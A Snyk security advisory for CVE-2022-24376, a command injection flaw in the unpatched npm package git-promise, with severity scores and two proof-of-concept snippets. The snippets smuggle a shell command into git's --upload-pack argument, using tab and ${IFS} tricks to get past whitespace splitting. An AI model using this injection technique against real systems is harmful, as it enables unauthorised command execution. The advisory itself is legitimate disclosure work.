Command Injection Affecting git-promise package, versions *
Snyk CVSS
Attack Complexity
Low
Privileges Required
High
Confidentiality
High
Integrity
High
Availability
High
Threat Intelligence
EPSS
0.7% (78th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-GITPROMISE-2434310
- published 8 Jun 2022
- disclosed 28 Mar 2022
- credit Liran Tal
Introduced: 28 Mar 2022
CVE-2022-24376 Open this link in a new tabHow to fix?
There is no fixed version for git-promise
.
Overview
git-promise is a Simple wrapper that allows you to run any git command using a more intuitive syntax.
Affected versions of this package are vulnerable to Command Injection due to an inappropriate fix of a prior vulnerability in this package. Note: Please note that the vulnerability will not be fixed. The README file was updated with a warning regarding this issue.
PoC 1
const git = require("git-promise");
// Use tab instead of spaces to separate between the touch command and its argument
git("fetch origin --upload-pack=touch /tmp/abcd", {cwd: '/tmp/example-git-repo'}).then((output) => console.log(output))
PoC 2
const git = require("git-promise");
// Use the shell's predefined separator using ${IFS} to escape the whitespace splitting logic
git("fetch origin --upload-pack=touch${IFS}/tmp/abcd-new", {cwd: '/tmp/example-git-repo'}).then((output) => console.log(output))